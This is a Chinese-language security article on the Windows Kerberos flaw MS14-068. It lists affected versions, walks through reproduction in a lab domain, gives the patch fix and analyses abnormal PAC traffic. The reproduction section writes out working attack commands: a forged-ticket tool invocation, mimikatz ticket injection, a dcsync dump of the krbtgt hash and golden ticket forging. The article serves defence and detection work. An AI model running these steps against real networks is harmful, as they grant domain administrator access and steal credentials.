MS14-068漏洞可謂是威力無窮，在域滲透中，第一步就是應該檢測域控是否有這個漏洞，一旦域控沒有打上這個補丁，將會使內網滲透變得十分簡單。對于內網安全問題，聚銘網絡也一直進行跟蹤守護，切實協助企業組織做好網絡安全防護建設工作，規避安全風險。

一、漏洞描述

遠程權限提升漏洞存在于Microsoft windows的Kerberos KDC實現中。存在該漏洞的癥狀是，Microsoft Kerberos KDC實現無法正確驗證簽名，這可能造成Kerberos服務票證的某些方面被人偽造。簡單來說就是一個域內的普通賬戶可以利用此漏洞進行權限提升，升級為域管理員權限。

二、受影響版本

Microsoft Windows Windows Server 2012 GoldR2

Microsoft Windows Windows Server 2012 Gold

Microsoft Windows Windows 7 SP1

Microsoft Windows Vista SP2

Microsoft Windows Server 2012 R2

Microsoft Windows Server 2008 SP2

Microsoft Windows Server 2003 SP2

Microsoft Windows 8.1

Microsoft Windows 8

三、漏洞利用前提

域控沒有打MS14-068補丁，攻擊者拿下了一臺域內的普通計算機并獲得普通域用戶以及密碼/hash值以及用戶suid。

四、漏洞復現

1.搭建環境

域控制器：windows 2008 r2域內主機：windows 7MS14-068.exemimikatz工具

2.漏洞利用

1）查看域控是否有MS14-068這個漏洞，利用命令systeminfo，查看是否打補丁（KB3011780）,下圖中沒有看到打MS14-068相關漏洞的補丁。

2）登陸域內主機利用whoami/all查看自己的用戶名以及sid

3）利用MS14-068.exe生成一個新的票據：MS14-068.exe -u user@domain -s sid -d域控ip -p密碼（出現報錯的話一般是密碼錯誤）

4）查看dir \域控計算機名稱c$

5）利用mimikatz先清除票據，再導入剛剛制作新的票據

(1) Kerberos::purge #清除票據

(2) Kerberos::list #列出票據

(3) Kerberos::ptc 票據位置 #導入票據

6）復現成功。再次利用dir \域控計算機名稱c$，發現提升到管理員權限，表明復現成功。

7）黃金票據偽造

a.查看用戶krbtgt的hash：

lsadump:dcsync /domain:域名 /all /csv

查看用戶的sid：

lsadump:dcsync /domain:域名 /user:krbtgt

b.制造票據

Kerberos::golden /admin:system /domain:域名 /sid :.... /krbtgt:...(hash) /ticket:票據名稱

c.導入票據

Kerberos::purge

Kerberos::ptt 票據名稱

d.復現成功

利用dir \域控名稱c$,出現目錄，表示成功。

五、修復方案

1. 升級補丁

與此同時，請及時做好自查和預防工作，以免遭受黑客攻擊。

六、復現過程中的異常流量分析

1.正常流量

2.異常流量分析

Client在發起認證請求時，通過設置include-PAC為False，則返回TGT中不會包含PAC。

• AS-REQ身份認證階段

• 票據授予階段TGS-REQ

• 總結：正常和異常流量的區別在于pac的配置上的異常

異常流量在1.AS-REQ階段終端設置了pac為false

正常流量在1.AS-REQ階段終端設置了pac為true

異常流量在3.TGS-REQ階段終端又多了一個pac的設置，且值為false

正常流量在3.TGS-REQ階段終端沒有關于pac 的設置